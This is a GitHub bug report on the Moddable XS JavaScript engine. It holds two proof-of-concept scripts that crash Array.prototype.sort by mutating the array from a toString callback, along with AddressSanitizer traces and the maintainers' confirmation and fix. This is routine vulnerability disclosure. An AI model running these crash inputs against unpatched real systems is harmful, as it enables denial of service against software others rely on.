Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SEGV xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort #766

Closed
hope-fly opened this issue Jan 7, 2022 · 3 comments
Closed

SEGV xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort #766

hope-fly opened this issue Jan 7, 2022 · 3 comments
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.

Comments

@hope-fly
Copy link

hope-fly commented Jan 7, 2022

Moddable-XS revision

Commit: 2f93df29

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
cd  ~/moddable/xs/makefiles/lin
#debug
make -f xst.mk
Test case
poc.js

var size = 256;
var array1 = new Array(size);

function toStr() {
  array1.splice(0, 2);
  return array1.sort().toString();
}

function JSEtest() {
  for (var i = 0; i < size; i++) {
    array1[i] = new Array(i);
    array1.sort()[i].toString = toStr;
  }
  array1.sort();
}

JSEtest();

Execution & Output
$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==101668==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x00000057e1b4 bp 0x7ffe5dc36870 sp 0x7ffe5dc35840 T0)
==101668==The signal is caused by a READ memory access.
==101668==Hint: address points to the zero page.
    #0 0x57e1b3 in fx_Array_prototype_sort /root/moddable/xs/sources/xsArray.c:2237:7
    #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #5 0x7faf269ccbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort
==101668==ABORTING

Credits: Found by OWL337 team.

@phoddie phoddie added the confirmed issue reported has been reproduced label Jan 8, 2022
@hope-fly
Copy link
Author

When the testcase changed a little, there's a new crash during fuzzing. I'm not sure whether it's a duplicated issue or not.
If its not, I'll open a new issue. Hope the info listed as follows will be helpful!

Test case
poc.js

var size = 1000;
var array1 = new Array(size);

function toStr() {
    array1.splice(0, 2);
    return array1.toString();
}

function JSEtest() {
    for (var i = 0; i < size; i++) {
        array1[i] = new Array(i);
        array1.sort()[i].toString = toStr;
    }
    array1.sort();
}

JSEtest();

Execution & Output
$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==39035==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000004c0 (pc 0x00000059c0a6 bp 0x7ffc9a80fa50 sp 0x7ffc9a80f730 T0)
==39035==The signal is caused by a READ memory access.
==39035==Hint: address points to the zero page.
    #0 0x59c0a5 in fxCompareArrayItem /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18
    #1 0x57dc9a in fx_Array_prototype_sort /home/f1yfuzz/moddable/xs/sources/xsArray.c:2235:14
    #2 0x84f3ca in fxRunID /home/f1yfuzz/moddable/xs/sources/xsRun.c:842:7
    #3 0x8ceaac in fxRunScript /home/f1yfuzz/moddable/xs/sources/xsRun.c:4766:4
    #4 0xad3231 in fxRunProgramFile /home/f1yfuzz/moddable/xs/tools/xst.c:1387:2
    #5 0xacfa83 in main /home/f1yfuzz/moddable/xs/tools/xst.c:281:8
    #6 0x7f8d44116bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #7 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18 in fxCompareArrayItem
==39035==ABORTING

@phoddie
Copy link
Collaborator

phoddie commented Jan 13, 2022

Thanks! From a quick look, it is tough to say if these are the same cause or not – the tests and crash are quite similar but the crash is in a different place. We'll investigate and let you know.

@phoddie
Copy link
Collaborator

phoddie commented Feb 1, 2022

This has been resolved in our most recent Moddable SDK update. There were changes to Array sorting and a change to xst to ensure a clean exit when the JavaScript stack overflow is detected. Thank you again for the report.

@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Feb 1, 2022
@phoddie phoddie closed this as completed Feb 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.
Projects
None yet
Development

No branches or pull requests

2 participants